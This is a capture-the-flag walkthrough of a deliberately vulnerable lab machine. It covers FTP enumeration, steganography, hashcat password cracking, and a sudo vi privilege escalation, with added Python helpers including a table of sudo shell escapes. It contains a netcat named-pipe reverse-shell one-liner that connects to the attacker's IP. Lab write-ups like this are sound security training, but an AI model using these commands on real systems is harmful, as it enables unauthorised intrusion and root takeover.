# Chocolate Factory

![](/files/-MbmyM7st0XqG7UYNTvs)

## Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (**-Pn**) so nmap skips host discovery and scans even if ICMP is blocked:

```
nmap -Pn 10.10.46.164
```

![](/files/-Mbmz6mmaHoN4L8DfC1P)

Detailed nmap scan of the ports found open:

Command breakdown:

* (**-sV**): Service version detection
* (**-sC**): Default nmap scripts (this is what reports anonymous FTP, for example)
* (**-p**): Specifying ports 21, 22 and 80
* (**-oN nmap**): Saving the normal output into a file called `nmap`

```
nmap -sV -sC -p 21,22,80 -oN nmap 10.10.46.164
```

![](/files/-Mbn29seXKJgjH7rTtpx)

## Enumeration

### Port 21: FTP

Anonymous login is allowed (log in with the username `anonymous` and any password), so let's check it out:

```
ftp 10.10.46.164
```

![](/files/-Mbn2RARxmR-bVQSwT5W)

Let's list the files.

![](/files/-Mbn2Yr6TdMOmctEEc5T)

Looks like there is one file and it is an image, so let's transfer it to our machine:

```
get gum_room.jpg
```

![](/files/-Mbn2iG89tIjPlMZvTf7)

Let's look at the image.

![](/files/-MbnD5LfdmufEYF1sW1T)

Let's see if there is information hidden in the file using `steghide`:

```
steghide info gum_room.jpg
```

![](/files/-Mbn3yjVlI_FY_JzB_Mg)

I hit enter for the passphrase (an empty passphrase) and it worked. There is one embedded file, `b64.txt`; let's extract it:

```
steghide --extract -sf gum_room.jpg
```

![](/files/-Mbn4Ajq3xqe0eGwOwoL)

Let's read the file.

![](/files/-Mbn4FmjP1g9Hma7uadS)

As the name suggests, the contents are base64-encoded. Decoding it gives this output:

![](/files/-Mbn4gwru3tMNrSSlAqo)

We have the password hash for the user `charlie`. It is a sha512crypt hash (hashcat mode 1800), so let's use hashcat to crack it and get Charlie's password.

Copy the hash (just the hash field, without the `charlie:` prefix and the trailing shadow fields) into a file called `hash.txt`.

![](/files/-Mbn5H9SYnLwY8e7-MvS)

Now let's use `hashcat` to crack it:

```bash
# -a 0: straight (wordlist) attack, -m 1800: sha512crypt ($6$) hashes
hashcat -a 0 -m 1800 hash.txt /usr/share/wordlists/rockyou.txt
```

![](/files/-MbnB4NVZPRriY9jk8Qs)
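The decode-then-identify step above, written out as a small Python helper. This is an example added to this writeup, not code from the room or the original post: it base64-decodes a blob, picks the hash out of an `/etc/shadow`-style line, and maps the crypt `$id$` prefix to the hashcat mode, which is the reasoning behind choosing `-m 1800`. It also handles the cases that trip people up when copying from a real shadow file: locked accounts (`!`/`*`), the `rounds=` parameter, legacy DES hashes, bcrypt and yescrypt prefixes. The shadow line and its salt/digest are constructed for the example and are not the room's hash.

```python
import base64
from typing import Optional

# Constructed sample for this example: an invented shadow-style line (the salt
# and the 86-character digest are placeholders, not the room's real hash),
# encoded the way the b64.txt pulled out of gum_room.jpg was.
CONSTRUCTED_SHADOW_LINE = "charlie:$6$Dxq8PbFu$" + "A" * 86 + ":18542:0:99999:7:::"
SAMPLE_B64 = base64.b64encode(CONSTRUCTED_SHADOW_LINE.encode()).decode()

# crypt(3) modular-format id -> hashcat mode (-m)
HASHCAT_MODES = {
    "1": 500,    # md5crypt
    "5": 7400,   # sha256crypt
    "6": 1800,   # sha512crypt, the format this room's hash used
    "2a": 3200,  # bcrypt variants
    "2b": 3200,
    "2y": 3200,
}


def identify(shadow_line: str) -> Optional[dict]:
    """Parse one /etc/shadow-style line (or a bare hash).

    Returns {"user", "hash", "mode"} or None when there is nothing to crack
    (locked '!'/'*' accounts, empty field, unknown layout). "mode" is None
    for a recognised layout hashcat has no mode for (e.g. yescrypt $y$).
    """
    line = shadow_line.strip()
    if line.startswith("$"):          # bare hash without the shadow fields
        user, field = None, line
    else:
        user, sep, rest = line.partition(":")
        if not sep:
            return None
        field = rest.split(":", 1)[0]
    if not field or field[0] in "!*":
        return None
    if not field.startswith("$"):
        # traditional 13-character DES crypt has no $id$ prefix
        return {"user": user, "hash": field, "mode": 1500}
    parts = field.split("$")          # "$6$salt$digest" -> ["", "6", "salt", "digest"]
    if len(parts) < 4 or not parts[-1]:
        return None
    return {"user": user, "hash": field, "mode": HASHCAT_MODES.get(parts[1])}


def recover_hashes(b64_text: str) -> list:
    """Decode a base64 blob holding shadow lines and identify each one."""
    text = base64.b64decode(b64_text).decode()
    return [info for info in map(identify, text.splitlines()) if info]


def hashcat_command(shadow_line: str,
                    hashfile: str = "hash.txt",
                    wordlist: str = "/usr/share/wordlists/rockyou.txt") -> Optional[str]:
    """Build the straight-mode (-a 0) hashcat invocation for a shadow line."""
    info = identify(shadow_line)
    if info is None or info["mode"] is None:
        return None
    return f"hashcat -a 0 -m {info['mode']} {hashfile} {wordlist}"


if __name__ == "__main__":
    for info in recover_hashes(SAMPLE_B64):
        print(info["user"], "->", info["mode"])
    print(hashcat_command(CONSTRUCTED_SHADOW_LINE))
```

The `$id$` lookup is the check worth keeping: feeding a `$6$` hash to hashcat with `-m 500` (or vice versa) produces a "separator unmatched" or token-length error rather than a wrong answer, but a `$y$` yescrypt hash from a recent Ubuntu or Debian box has no hashcat mode at all and needs a different tool.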

We found the password `cn7824`; let's try to log in through SSH:

```bash
ssh charlie@10.10.46.164
```

![](/files/-MbnBO4rpdqP-QozvMgx)

That password doesn't work for SSH, so let's go and explore port 80.

### Port 80: HTTP

Let's visit the website.

![](/files/-MbnAxmFR5YyXQnD6tKP)

It's a login page. Remember the credentials we found; let's use them to log in.

![](/files/-MbnB_nFPdy6hcPexDkR)

We're logged in, and the page lets us run commands. Normal commands work, so let's get a reverse shell. First start a netcat listener on our machine:

```bash
nc -lvnp 1234
```

![](/files/-MbnBothtnUWGk1N65vD)

Let's take a reverse shell one-liner from the [pentestmonkey cheat sheet](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet), replacing the IP with our own:

```bash
# named-pipe reverse shell: nc reads our commands into the fifo, /bin/sh executes them,
# and its stdout/stderr flow back through nc to our listener
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f
```

Execute this command through the web page and we get a reverse shell on the machine:

![](/files/-MbnCGSAFB4powThNzIh)

Let's stabilize this shell with the following commands:

```bash
python -c 'import pty; pty.spawn("/bin/bash")'   # spawn a pty so interactive programs work
# press Ctrl + Z to background the remote shell
stty raw -echo; fg                               # stop the local tty handling echo/signals, then foreground
reset                                            # re-initialise the terminal
# press Ctrl + C
export TERM=xterm-color
```

![](/files/-MbnCYogC1qT4gqIXlFZ)

Let's list the files in the current directory.

![](/files/-MbnCjvr0EhmIZinvUhF)

We have a `validate.php` file; let's read it.

![](/files/-MbnDEpDpsdlehKat3H7)

It contains, in plaintext, the credentials we just used to log in to the web page. I tried to run the key file but it said permission denied.

![](/files/-MbnDnUCRTzLTlxjl2sI)

So I used `strings`, which prints the runs of printable characters in a binary, and it gave me the important information:

```bash
strings key_rev_key
```

![](/files/-MbnE5LE7e3L5Nou5kB5)
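To show what `strings` actually does (and why the key is readable without execute permission on the file), here is a minimal reimplementation of its core in Python. This is an example added to this writeup, not code from the room: it scans a byte blob for runs of printable ASCII, reports the offset of each run like `strings -t d`, and filters them the way `strings key_rev_key | grep -i key` would. The byte blob is constructed for the example; the "key" in it is invented and is not the room's key.

```python
import re
from typing import List, Tuple

# Constructed sample for this example: a few bytes mimicking a small ELF file
# with embedded strings. It stands in for key_rev_key; the "key" is invented.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00"   # ELF magic: "ELF" is too short to count
    b"\x90\x90\xcc"                               # junk code bytes
    b"congratulations! you have found the key: \x00"
    b"\x00\x01\x02"
    b"EXAMPLE_KEY_NOT_REAL\x00"
    b"\xff\xfe"
    b"hi\x00"                                     # below the default minimum length
    b"/lib64/ld-linux-x86-64.so.2\x00"
)


def extract_strings(data: bytes, min_len: int = 4) -> List[Tuple[int, str]]:
    """Core of strings(1): every run of at least min_len printable ASCII
    bytes (0x20-0x7e plus tab), paired with its byte offset in the file."""
    pattern = re.compile(rb"[\x20-\x7e\t]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii")) for m in pattern.finditer(data)]


def grep_strings(data: bytes, needle: str, min_len: int = 4) -> List[str]:
    """What `strings FILE | grep -i NEEDLE` would print."""
    needle = needle.lower()
    return [s for _, s in extract_strings(data, min_len) if needle in s.lower()]


if __name__ == "__main__":
    for offset, s in extract_strings(SAMPLE_BINARY):
        print(f"{offset:7d} {s}")
```

The minimum length is the caveat to remember: `strings` defaults to 4, so a short key or flag fragment is silently dropped unless you pass `-n 2` (or `min_len=2` here). Nothing in the binary is executed, which is why read permission is all that was needed.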

We have a key. With this information we can answer two of the room's questions.

![](/files/-MbnECknfX18oWjAr83F)

While enumerating I realized that we can change directory into `charlie`'s home directory, so I listed the files there and found `user.txt` and some other files.

![](/files/-MbnF7jg1dAW71ENHOsY)

Let's read the `teleport` file.

![](/files/-MbnFLsO9WHlxLtQdckd)

It's an RSA private key; we can use it to log in as `charlie` through SSH. First copy the contents of the file into a file on your machine called `id_rsa`.

![](/files/-MbnFiJ-5qzIPUaPrNJX)

Now restrict the permissions of the file, since `ssh` refuses to use a private key that is readable by other users:

```bash
chmod 600 id_rsa
```

![](/files/-MbnFueZniGk5NXgCNIA)

Now let's log in:

```bash
ssh -i id_rsa charlie@10.10.46.164
```

![](/files/-MbnG5eZY1JvsD7r-IB7)

We are logged in.

## Privilege Escalation

Let's run `sudo -l` to see what we can run as root:

```bash
sudo -l
```

![](/files/-MbnGWduFlBgURDowrka)

Looks like we can run `/usr/bin/vi` as root, so let's go to [GTFOBins](https://gtfobins.github.io/gtfobins/vi/#sudo) to find the command that escalates our privileges to root.

![](/files/-MbnGjVioryi2EkVXJ7U)
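The `sudo -l` to GTFOBins lookup is mechanical enough to script. The following Python is an example added to this writeup (not from the room or the original post): it parses the command section of `sudo -l` output into one record per command, keeps only rules that run as root, and pairs each binary with its well-known sudo shell escape, flagging `NOPASSWD` and wildcard arguments on the way. The sample output is constructed; only the `vi` entry mirrors what the page shows, and the hostname, the `less`/`id`/`vim` rules and the `www-data` run-as user are invented. The escape table covers the common GTFOBins entries, not all of them.

```python
import os
import re
from typing import List

# Constructed sample `sudo -l` output for this example. Only the vi entry
# mirrors the page; the hostname and the other rules are invented.
SAMPLE_SUDO_L = """\
Matching Defaults entries for charlie on target:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User charlie may run the following commands on target:
    (ALL : ALL) NOPASSWD: /usr/bin/vi
    (root) /usr/bin/less, /usr/bin/id
    (www-data) /usr/bin/vim
"""

# Binaries with a well-known shell escape under sudo (GTFOBins "sudo" entries),
# keyed by basename. Not exhaustive.
SHELL_ESCAPES = {
    "vi":      "sudo vi -c ':!/bin/sh' /dev/null",
    "vim":     "sudo vim -c ':!/bin/sh' /dev/null",
    "less":    "sudo less /etc/profile   (then type  !/bin/sh)",
    "awk":     "sudo awk 'BEGIN {system(\"/bin/sh\")}'",
    "find":    "sudo find . -exec /bin/sh \\; -quit",
    "python":  "sudo python -c 'import os; os.system(\"/bin/sh\")'",
    "python3": "sudo python3 -c 'import os; os.system(\"/bin/sh\")'",
    "perl":    "sudo perl -e 'exec \"/bin/sh\";'",
    "env":     "sudo env /bin/sh",
    "bash":    "sudo bash",
    "sh":      "sudo sh",
}

# "(runas) [TAG: ...] /path/cmd args, /path/cmd2 args"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")


def parse_sudo_l(text: str) -> List[dict]:
    """Turn the command section of `sudo -l` into one record per command."""
    entries, in_commands = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        m = ENTRY_RE.match(line) if in_commands else None
        if not m:
            continue
        runas_user = m.group("runas").split(":")[0].strip()   # "(ALL : ALL)" -> "ALL"
        nopasswd = "NOPASSWD:" in m.group("tags")
        for spec in m.group("cmds").split(", "):
            entries.append({
                "binary": spec.split()[0],
                "spec": spec.strip(),
                "as_root": runas_user in ("ALL", "root"),
                "nopasswd": nopasswd,
                "wildcard": "*" in spec,
            })
    return entries


def find_escalations(text: str) -> List[dict]:
    """Root-capable entries that allow ALL or have a known shell escape."""
    hits = []
    for e in parse_sudo_l(text):
        if not e["as_root"]:
            continue
        name = os.path.basename(e["binary"])
        if e["binary"] == "ALL":
            hits.append({**e, "escape": "sudo /bin/sh"})
        elif name in SHELL_ESCAPES:
            hits.append({**e, "escape": SHELL_ESCAPES[name]})
    return hits


if __name__ == "__main__":
    for hit in find_escalations(SAMPLE_SUDO_L):
        tag = "NOPASSWD" if hit["nopasswd"] else "password required"
        print(f"{hit['spec']:20} [{tag}] -> {hit['escape']}")
```

Two details matter in practice: a rule that runs as a user other than root (the `www-data` line) still gives a shell, just not a root one, so it is reported separately from the root hits; and `NOPASSWD` decides whether Charlie's cracked password is needed at all, which is why it is worth recording alongside the binary.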

Let's run this command:

```bash
# -c runs an ex command at startup; ':!/bin/sh' spawns a shell, inheriting vi's root privileges
sudo vi -c ':!/bin/sh' /dev/null
```

![](/files/-MbnGrlL0R8QJZqt9LZa)

We are now root. `cd` into `/root` to find the root flag: instead of a plain `root.txt` there is a Python script that prints the flag. Running it asks for a key; remember the key we found during enumeration, type that in and you get the flag.

![](/files/-MbnHh0aYXsq8jk0tMji)

